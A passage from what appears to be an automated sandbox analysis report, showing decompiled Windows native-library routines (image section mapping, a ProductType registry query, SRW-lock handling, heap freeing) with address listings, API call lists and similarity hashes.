                                                                                                                            0x6b20d8ce
                                                                                                                            0x6b20d8cf
                                                                                                                            0x6b20d8d0
                                                                                                                            0x6b20d8d1
                                                                                                                            0x6b20d8d6
                                                                                                                            0x6b20d8dc
                                                                                                                            0x6b20d8e0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20d8e2
                                                                                                                            0x6b20d8e3
                                                                                                                            0x6b20d8e4
                                                                                                                            0x6b20d8e9
                                                                                                                            0x6b20d8ec
                                                                                                                            0x6b20d8f0
                                                                                                                            0x6b20d8f3
                                                                                                                            0x6b20d8f4
                                                                                                                            0x6b20d8f5
                                                                                                                            0x6b20d8f9
                                                                                                                            0x6b20d8fa
                                                                                                                            0x6b20d8fc
                                                                                                                            0x6b20d8ff
                                                                                                                            0x6b20d908
                                                                                                                            0x6b20d90a
                                                                                                                            0x6b20d90c
                                                                                                                            0x6b20d90f
                                                                                                                            0x6b20d914
                                                                                                                            0x6b20d914
                                                                                                                            0x6b20d919
                                                                                                                            0x00000000
                                                                                                                            0x6b20d91b
                                                                                                                            0x6b20d91e
                                                                                                                            0x6b20d925
                                                                                                                            0x6b20d96f
                                                                                                                            0x6b20d96f
                                                                                                                            0x6b20d929
                                                                                                                            0x00000000
                                                                                                                            0x6b20d92b
                                                                                                                            0x6b20d931
                                                                                                                            0x6b20d933
                                                                                                                            0x6b20d938
                                                                                                                            0x6b20d93d
                                                                                                                            0x6b20d93d
                                                                                                                            0x6b20d93f
                                                                                                                            0x6b20d944
                                                                                                                            0x6b24b1f0
                                                                                                                            0x6b24b1f6
                                                                                                                            0x6b24b1f9
                                                                                                                            0x6b24b1f9
                                                                                                                            0x6b20d94a
                                                                                                                            0x6b20d94d
                                                                                                                            0x6b20d94d
                                                                                                                            0x00000000
                                                                                                                            0x6b20d944
                                                                                                                            0x6b20d929
                                                                                                                            0x6b20d919
                                                                                                                            0x6b20d89c
                                                                                                                            0x6b20d8a1
                                                                                                                            0x6b24b1bc
                                                                                                                            0x6b24b1c0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24b1c6
                                                                                                                            0x6b24b1c9
                                                                                                                            0x6b24b1d5
                                                                                                                            0x6b24b1db
                                                                                                                            0x6b20d8a9
                                                                                                                            0x6b20d8b6
                                                                                                                            0x00000000
                                                                                                                            0x6b20d8b6
                                                                                                                            0x6b20d8a7
                                                                                                                            0x6b20d8a7
                                                                                                                            0x00000000
                                                                                                                            0x6b20d8a7
                                                                                                                            0x6b20d83f
                                                                                                                            0x6b20d843
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20d849
                                                                                                                            0x6b20d84c
                                                                                                                            0x6b20d84f
                                                                                                                            0x6b20d855
                                                                                                                            0x6b24b1a8
                                                                                                                            0x6b24b1ae
                                                                                                                            0x6b24b1b1
                                                                                                                            0x6b20d85b
                                                                                                                            0x6b20d85b
                                                                                                                            0x6b20d85b
                                                                                                                            0x6b20d85d
                                                                                                                            0x6b20d866
                                                                                                                            0x00000000
                                                                                                                            0x6b20d86c
                                                                                                                            0x6b20d86c
                                                                                                                            0x00000000
                                                                                                                            0x6b20d86c
                                                                                                                            0x6b20d866

                                                                                                                            APIs
                                                                                                                            • RtlImageNtHeader.1105(?,00000000,?,02BE0000), ref: 6B20D807
                                                                                                                              • Part of subcall function 6B1EB060: RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,?,?,6B20381C,?,6B2AFF48,00000050,6B203E98,?,6B1FF900,00000000,00000000), ref: 6B1EB076
                                                                                                                              • Part of subcall function 6B1E65BA: RtlInitUnicodeStringEx.1105(?,?,?), ref: 6B1E65CA
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,6B20D77E,00000000,?,?,00000000,?,02BE0000), ref: 6B20D8B6
                                                                                                                            • ZwCreateSection.1105(00000000,000F0005,00000000,00000000,02BE0000,08000000,00000000,6B20D77E,00000000,?,?,00000000,?,02BE0000), ref: 6B20D8D7
                                                                                                                            • ZwMapViewOfSection.1105(00000000,000000FF,00000000,00000000,00000000,?,?,00000001,00000000,02BE0000,00000000,000F0005,00000000,00000000,02BE0000,08000000), ref: 6B20D8FF
                                                                                                                            • ZwClose.1105(00000000,00000000,000000FF,00000000,00000000,00000000,?,?,00000001,00000000,02BE0000,00000000,000F0005,00000000,00000000,02BE0000), ref: 6B20D90F
                                                                                                                            • RtlImageNtHeader.1105(00000000,00000000,000000FF,00000000,00000000,00000000,?,?,00000001,00000000,02BE0000,00000000,000F0005,00000000,00000000,02BE0000), ref: 6B20D91E
                                                                                                                            • ZwClose.1105(00000000,?,6B20D77E,00000000,?,?,00000000,?,02BE0000), ref: 6B24B1C9
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000000,?,6B20D77E,00000000,?,?,00000000,?,02BE0000), ref: 6B24B1DB
                                                                                                                              • Part of subcall function 6B20D976: ZwCreateFile.1105(00000000,80100080,00000018,?,00000000,00000000,00000005,00000001,00000000,00000000,00000000,?,02BE0000,00000000,00000000), ref: 6B20D999
                                                                                                                            • ZwClose.1105(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,00000001,00000000,02BE0000,00000000,000F0005,00000000,00000000), ref: 6B24B1F9
                                                                                                                            • ZwUnmapViewOfSection.1105(000000FF,00000000,6B20D77E,00000000,?,?,00000000,?,02BE0000), ref: 6B24B218
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHeaderImageSection$CreateFreeHeapView$FileInitStringUnicodeUnmap
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 3014096824-2766056989
                                                                                                                            • Opcode ID: f9e51fa7ed1cb36f85b7a86adbf40520465290fbffd2fdb35cf32ec65272afcf
                                                                                                                            • Instruction ID: eb15c814f596a761463b41743bf86b8123e124fb87fd0f9d0762fa1c00f11f39
                                                                                                                            • Opcode Fuzzy Hash: f9e51fa7ed1cb36f85b7a86adbf40520465290fbffd2fdb35cf32ec65272afcf
                                                                                                                            • Instruction Fuzzy Hash: 6A618F71D4520EABDF11CFA8C884F9EBBF4FF85755F104169E824A7294DB789A02CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2864FB, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 125nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E6B2864FB(intOrPtr* __ecx) {
				signed int _v8;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char* _v52;
				short _v54;
				void* _v56;
				char* _v60;
				char _v64;
				char* _v68;
				short _v70;
				char _v72;
				char* _v76;
				short _v78;
				void* _v80;
				char* _v84;
				short _v86;
				void* _v88;
				char* _v92;
				short _v94;
				void* _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t48;
				short _t49;
				void* _t50;
				short _t51;
				void* _t55;
				void* _t62;
				void* _t77;
				short _t81;
				short _t82;
				intOrPtr* _t83;
				signed int _t85;

				_v8 =  *0x6b2cd360 ^ _t85;
				_t48 = 0x16;
				_t82 = 0x18;
				_t83 = __ecx;
				_v72 = _t48;
				_t77 = 0x10;
				_t49 = 0x12;
				_v86 = _t49;
				_v94 = _t49;
				_t50 = 0xa;
				_v80 = _t50;
				_t51 = 0xc;
				_v78 = _t51;
				_v112 =  &_v64;
				_push( &_v120);
				_v88 = _t77;
				_v96 = _t77;
				_push(1);
				_push( &_v48);
				_v64 = 0x840082;
				_v60 = L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\ProductOptions";
				_v70 = _t82;
				_v68 = L"ProductType";
				_v84 = L"LanmanNt";
				_v92 = L"ServerNt";
				_v76 = L"WinNt";
				_v48 = 0;
				_v120 = _t82;
				_v116 = 0;
				_v108 = 0x240;
				_v104 = 0;
				_v100 = 0;
				_t55 = E6B219600();
				_t84 = _t55;
				if(_t55 >= 0) {
					_push( &_v124);
					_push(0x24);
					_push( &_v44);
					_push(2);
					_push( &_v72);
					_push(_v48);
					_t62 = E6B219650();
					_t84 = _t62;
					if(_t62 >= 0) {
						if(_v40 != 1) {
							L10:
							_t84 = 0xc000090b;
						} else {
							_t31 =  &_v36; // 0x6b246637
							_t81 =  *_t31;
							if(_t81 < 2) {
								goto L10;
							} else {
								_v54 = _t81;
								_v52 =  &_v32;
								_v56 = _t81 - 2;
								if(RtlEqualUnicodeString( &_v56,  &_v80, 1) == 0) {
									if(RtlEqualUnicodeString( &_v56,  &_v88, 1) == 0) {
										if(RtlEqualUnicodeString( &_v56,  &_v96, 1) == 0) {
											goto L10;
										} else {
											 *_t83 = 3;
										}
									} else {
										 *_t83 = 2;
									}
								} else {
									 *_t83 = 1;
								}
							}
						}
					}
				}
				if(_v48 != 0) {
					_push(_v48);
					E6B2195D0();
				}
				return E6B21B640(_t84, 1, _v8 ^ _t85, _t82, _t83, _t84);
			}















































                                                                                                                            0x6b28650a
                                                                                                                            0x6b286512
                                                                                                                            0x6b286515
                                                                                                                            0x6b286518
                                                                                                                            0x6b28651a
                                                                                                                            0x6b28651e
                                                                                                                            0x6b286521
                                                                                                                            0x6b286524
                                                                                                                            0x6b28652a
                                                                                                                            0x6b28652f
                                                                                                                            0x6b286532
                                                                                                                            0x6b286536
                                                                                                                            0x6b286537
                                                                                                                            0x6b28653e
                                                                                                                            0x6b286544
                                                                                                                            0x6b286545
                                                                                                                            0x6b28654c
                                                                                                                            0x6b286552
                                                                                                                            0x6b286553
                                                                                                                            0x6b286554
                                                                                                                            0x6b28655b
                                                                                                                            0x6b286562
                                                                                                                            0x6b286566
                                                                                                                            0x6b28656d
                                                                                                                            0x6b286574
                                                                                                                            0x6b28657b
                                                                                                                            0x6b286582
                                                                                                                            0x6b286585
                                                                                                                            0x6b286588
                                                                                                                            0x6b28658b
                                                                                                                            0x6b286592
                                                                                                                            0x6b286595
                                                                                                                            0x6b286598
                                                                                                                            0x6b28659d
                                                                                                                            0x6b2865a1
                                                                                                                            0x6b2865aa
                                                                                                                            0x6b2865ab
                                                                                                                            0x6b2865b0
                                                                                                                            0x6b2865b1
                                                                                                                            0x6b2865b6
                                                                                                                            0x6b2865b7
                                                                                                                            0x6b2865ba
                                                                                                                            0x6b2865bf
                                                                                                                            0x6b2865c3
                                                                                                                            0x6b2865c8
                                                                                                                            0x6b28662d
                                                                                                                            0x6b28662d
                                                                                                                            0x6b2865ca
                                                                                                                            0x6b2865ca
                                                                                                                            0x6b2865ca
                                                                                                                            0x6b2865d0
                                                                                                                            0x00000000
                                                                                                                            0x6b2865d2
                                                                                                                            0x6b2865d5
                                                                                                                            0x6b2865d9
                                                                                                                            0x6b2865df
                                                                                                                            0x6b2865f3
                                                                                                                            0x6b286609
                                                                                                                            0x6b286623
                                                                                                                            0x00000000
                                                                                                                            0x6b286625
                                                                                                                            0x6b286625
                                                                                                                            0x6b286625
                                                                                                                            0x6b28660b
                                                                                                                            0x6b28660b
                                                                                                                            0x6b28660b
                                                                                                                            0x6b2865f5
                                                                                                                            0x6b2865f5
                                                                                                                            0x6b2865f5
                                                                                                                            0x6b2865f3
                                                                                                                            0x6b2865d0
                                                                                                                            0x6b2865c8
                                                                                                                            0x6b2865c3
                                                                                                                            0x6b286636
                                                                                                                            0x6b286638
                                                                                                                            0x6b28663b
                                                                                                                            0x6b28663b
                                                                                                                            0x6b286652

                                                                                                                            APIs
                                                                                                                            • ZwOpenKey.1105(?,00000001,?,00000124,00000000,00000000), ref: 6B286598
                                                                                                                              • Part of subcall function 6B219600: LdrInitializeThunk.NTDLL(6B211119,?,?,00000018,?), ref: 6B21960A
                                                                                                                            • ZwQueryValueKey.1105(?,?,00000002,?,00000024,?,?,00000001,?,00000124,00000000,00000000), ref: 6B2865BA
                                                                                                                            • RtlEqualUnicodeString.1105(?,?,00000001,?,?,00000002,?,00000024,?,?,00000001,?,00000124,00000000,00000000), ref: 6B2865EC
                                                                                                                            • RtlEqualUnicodeString.1105(?,?,00000001,?,?,00000001,?,?,00000002,?,00000024,?,?,00000001,?,00000124), ref: 6B286602
                                                                                                                            • ZwClose.1105(00000000,?,00000001,?,00000124,00000000,00000000), ref: 6B28663B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: EqualStringUnicode$CloseInitializeOpenQueryThunkValue
                                                                                                                            • String ID: 7f$k$LanmanNt$ProductType$ServerNt$WinNt$\Registry\Machine\System\CurrentControlSet\Control\ProductOptions
                                                                                                                            • API String ID: 1342846649-4171476760
                                                                                                                            • Opcode ID: f548d82cb2b1d97c4961b674c24993a649f9406f3210029b5a46dab05e9abdd5
                                                                                                                            • Instruction ID: eae7e8f97ddf6d72eac49190ec9c335a200df3e059f82d688262a3c3e264cbbd
                                                                                                                            • Opcode Fuzzy Hash: f548d82cb2b1d97c4961b674c24993a649f9406f3210029b5a46dab05e9abdd5
                                                                                                                            • Instruction Fuzzy Hash: 4E415D72D5025DAADB11CFE4D982ADEB7F8EF09304F20402BE514BB290E7799909CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D395E, Relevance: 19.7, APIs: 13, Instructions: 172COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 83%
                                                                                                                            			E6B1D395E(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t67;
				void* _t77;
				intOrPtr* _t81;
				signed int _t93;
				void* _t94;
				intOrPtr* _t97;
				intOrPtr* _t104;
				void* _t112;
				long _t113;
				signed int _t114;
				void* _t123;

				_v8 =  *0x6b2cd360 ^ _t114;
				_v16 = __edx;
				_t93 = 0;
				_t112 = __ecx;
				_v12 = _v12 & 0;
				E6B1FFAD0( *0x6b2c84cc + 4);
				_t110 =  *0x6b2c84cc + 8;
				_t97 =  *_t110;
				while(_t97 != _t110) {
					_t113 = _t97 - 0x1c;
					_t67 =  *((intOrPtr*)(_t112 + 0xc));
					if( *((intOrPtr*)(_t113 + 0x10)) !=  *((intOrPtr*)(_t112 + 8)) ||  *((intOrPtr*)(_t113 + 0x14)) != _t67 ||  *((intOrPtr*)(_t113 + 8)) !=  *_t112) {
						L21:
						_t97 =  *_t97;
						continue;
					} else {
						_t69 =  *((intOrPtr*)(_t113 + 0xc));
						if( *((intOrPtr*)(_t113 + 0xc)) !=  *((intOrPtr*)(_t112 + 4))) {
							goto L21;
						}
						_t94 = _t113 + 0x28;
						E6B1F2280(_t69, _t94);
						if( *(_t113 + 0x5c) == 2) {
							__eflags = _v16;
							if(_v16 == 0) {
								RtlFreeHeap( *( *[fs:0x30] + 0x18), 0,  *(_t113 + 0x58));
								 *(_t113 + 0x58) =  *(_t113 + 0x58) & 0x00000000;
								 *(_t113 + 0x5c) =  *(_t113 + 0x5c) & 0x00000000;
								L8:
								asm("lock inc dword [esi+0x50]");
								 *(_t113 + 0x5c) = 1;
								E6B1EFFB0(_t94, _t112, _t94);
								_t123 =  *0x6b2c84cc + 4;
								E6B1FFA00(_t94, _t97, _t112,  *0x6b2c84cc + 4);
								while(1) {
									_t95 = 0;
									_t77 = E6B1D3ACA(0, _t112, _t113, _t112, _t113, _t123, 0);
									_t124 = _t77 - 0xc000022d;
									if(_t77 == 0xc000022d) {
										_t95 = 0xc000022d;
									}
									_t110 = _t113;
									if(E6B1D3ACA(_t95, _t112, _t113, _t112, _t113, _t124, 1) == 0xc000022d) {
										_t93 = 0xc000022d;
									}
									E6B1F2280(_t113 + 0x28, _t113 + 0x28);
									_v12 = _v12 + 1;
									_t104 = _t113 + 0x2c;
									_t81 =  *_t104;
									while(_t81 != _t104) {
										 *(_t81 + 0x60) =  *(_t81 + 0x60) & 0x00000000;
										_t81 =  *_t81;
									}
									if( *(_t113 + 0x58) != 0) {
										_t112 =  *(_t113 + 0x58);
										 *(_t113 + 0x58) =  *(_t113 + 0x58) & 0x00000000;
										E6B1EFFB0(_t93, _t112, _t113 + 0x28);
										continue;
									}
									if(_t93 != 0) {
										__eflags = _t93 - 0xc000022d;
										if(_t93 == 0xc000022d) {
											 *(_t113 + 0x58) = _t112;
											 *(_t113 + 0x5c) = 2;
											E6B262DA1(_t113);
										}
										L17:
										E6B1EFFB0(_t93, _t112, _t113 + 0x28);
										E6B20DE9E(_t113);
										L18:
										if(_v12 > 1) {
											_t113 = 0;
											_t49 = _t112 + 8; // 0x8
											_push(0);
											_push(0);
											_push(_t93);
											_push( *((intOrPtr*)(_t112 + 0x18)));
											_push(_t112);
											E6B21A3A0();
											__eflags = _t93;
											if(_t93 == 0) {
												RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t112);
											}
											_t93 = 0x80;
										}
										return E6B21B640(_t93, _t93, _v8 ^ _t114, _t110, _t112, _t113);
									}
									 *(_t113 + 0x5c) =  *(_t113 + 0x5c) & _t93;
									if( *((intOrPtr*)(_t113 + 0x18)) != _t93) {
										__eflags =  *((intOrPtr*)(_t112 + 0x10)) -  *((intOrPtr*)(_t113 + 0x18));
										if( *((intOrPtr*)(_t112 + 0x10)) -  *((intOrPtr*)(_t113 + 0x18)) > 0) {
											goto L16;
										}
										goto L17;
									}
									L16:
									 *((intOrPtr*)(_t113 + 0x18)) =  *((intOrPtr*)(_t112 + 0x10));
									goto L17;
								}
							}
							_push(_t94);
							L27:
							E6B1EFFB0(_t94, _t112);
							_t93 = 0x80;
							break;
						}
						if( *(_t113 + 0x5c) == 1) {
							__eflags = _v16;
							_push(_t94);
							if(_v16 != 0) {
								goto L27;
							}
							 *(_t113 + 0x58) = _t112;
							E6B1EFFB0(_t94, _t112);
							_t93 = 0x103;
							break;
						}
						goto L8;
					}
				}
				E6B1FFA00(_t93, _t97, _t112,  *0x6b2c84cc + 4);
				goto L18;
			}





















                                                                                                                            0x6b1d396d
                                                                                                                            0x6b1d397b
                                                                                                                            0x6b1d397e
                                                                                                                            0x6b1d3980
                                                                                                                            0x6b1d3982
                                                                                                                            0x6b1d3986
                                                                                                                            0x6b1d3991
                                                                                                                            0x6b1d3994
                                                                                                                            0x6b1d3996
                                                                                                                            0x6b1d39a1
                                                                                                                            0x6b1d39a7
                                                                                                                            0x6b1d39aa
                                                                                                                            0x6b1d3aa7
                                                                                                                            0x6b1d3aa7
                                                                                                                            0x00000000
                                                                                                                            0x6b1d39c4
                                                                                                                            0x6b1d39c4
                                                                                                                            0x6b1d39ca
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d39d0
                                                                                                                            0x6b1d39d4
                                                                                                                            0x6b1d39dd
                                                                                                                            0x6b22fffc
                                                                                                                            0x6b230000
                                                                                                                            0x6b230020
                                                                                                                            0x6b230025
                                                                                                                            0x6b230029
                                                                                                                            0x6b1d39ed
                                                                                                                            0x6b1d39ed
                                                                                                                            0x6b1d39f2
                                                                                                                            0x6b1d39f9
                                                                                                                            0x6b1d3a03
                                                                                                                            0x6b1d3a07
                                                                                                                            0x6b1d3a0c
                                                                                                                            0x6b1d3a0c
                                                                                                                            0x6b1d3a13
                                                                                                                            0x6b1d3a1d
                                                                                                                            0x6b1d3a1f
                                                                                                                            0x6b23004b
                                                                                                                            0x6b23004b
                                                                                                                            0x6b1d3a27
                                                                                                                            0x6b1d3a37
                                                                                                                            0x6b230052
                                                                                                                            0x6b230052
                                                                                                                            0x6b1d3a41
                                                                                                                            0x6b1d3a46
                                                                                                                            0x6b1d3a49
                                                                                                                            0x6b1d3a4c
                                                                                                                            0x6b1d3a4e
                                                                                                                            0x6b1d3a9f
                                                                                                                            0x6b1d3aa3
                                                                                                                            0x6b1d3aa3
                                                                                                                            0x6b1d3a56
                                                                                                                            0x6b230059
                                                                                                                            0x6b23005f
                                                                                                                            0x6b230064
                                                                                                                            0x00000000
                                                                                                                            0x6b230064
                                                                                                                            0x6b1d3a5e
                                                                                                                            0x6b230073
                                                                                                                            0x6b230075
                                                                                                                            0x6b23007d
                                                                                                                            0x6b230080
                                                                                                                            0x6b230087
                                                                                                                            0x6b230087
                                                                                                                            0x6b1d3a72
                                                                                                                            0x6b1d3a76
                                                                                                                            0x6b1d3a7d
                                                                                                                            0x6b1d3a82
                                                                                                                            0x6b1d3a86
                                                                                                                            0x6b230091
                                                                                                                            0x6b230093
                                                                                                                            0x6b230096
                                                                                                                            0x6b230097
                                                                                                                            0x6b230098
                                                                                                                            0x6b230099
                                                                                                                            0x6b23009c
                                                                                                                            0x6b23009e
                                                                                                                            0x6b2300a3
                                                                                                                            0x6b2300a5
                                                                                                                            0x6b2300b2
                                                                                                                            0x6b2300b2
                                                                                                                            0x6b2300b7
                                                                                                                            0x6b2300b7
                                                                                                                            0x6b1d3a9e
                                                                                                                            0x6b1d3a9e
                                                                                                                            0x6b1d3a64
                                                                                                                            0x6b1d3a6a
                                                                                                                            0x6b1d3ac4
                                                                                                                            0x6b1d3ac6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3ac8
                                                                                                                            0x6b1d3a6c
                                                                                                                            0x6b1d3a6f
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3a6f
                                                                                                                            0x6b1d3a0c
                                                                                                                            0x6b230002
                                                                                                                            0x6b230003
                                                                                                                            0x6b230003
                                                                                                                            0x6b230008
                                                                                                                            0x00000000
                                                                                                                            0x6b230008
                                                                                                                            0x6b1d39e7
                                                                                                                            0x6b230032
                                                                                                                            0x6b230036
                                                                                                                            0x6b230037
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b230039
                                                                                                                            0x6b23003c
                                                                                                                            0x6b230041
                                                                                                                            0x00000000
                                                                                                                            0x6b230041
                                                                                                                            0x00000000
                                                                                                                            0x6b1d39e7
                                                                                                                            0x6b1d39aa
                                                                                                                            0x6b1d3ab7
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockShared.1105(?,00000000,00000000,00000000), ref: 6B1D3986
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,?,00000000,00000000,00000000), ref: 6B1D39D4
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?), ref: 6B1D39F9
                                                                                                                            • RtlReleaseSRWLockShared.1105(?,?), ref: 6B1D3A07
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,00000001,00000000,?,?), ref: 6B1D3A41
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,00000001,00000000,?,?), ref: 6B1D3A76
                                                                                                                            • RtlReleaseSRWLockShared.1105(?,?,00000000,00000000,00000000), ref: 6B1D3AB7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Lock$ExclusiveRelease$AcquireShared
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1363392280-0
                                                                                                                            • Opcode ID: bc4e8e426abd6aee190c38aef08e0da7cf66ab4bca3bf79c0101b12e2fca2eb4
                                                                                                                            • Instruction ID: 30d011255d783b8d1efbb4e331a23ab52c3eaad62e71dc1cb3ae1181fa4ac817
                                                                                                                            • Opcode Fuzzy Hash: bc4e8e426abd6aee190c38aef08e0da7cf66ab4bca3bf79c0101b12e2fca2eb4
                                                                                                                            • Instruction Fuzzy Hash: 54516A71B00749AFDB30CB6AD884B6BB3F8EB4571AF11486DE14687650DB7CE846CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FA830, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 350COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E6B1FA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x6b2c8748 - 1;
					if( *0x6b2c8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E6B1DB150();
									_t260 = _t257 + 4;
								} else {
									E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E6B1DB150();
								_t257 = _t260 + 4;
								__eflags =  *0x6b2c7bc8;
								if(__eflags == 0) {
									E6B292073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E6B29A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E6B22D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
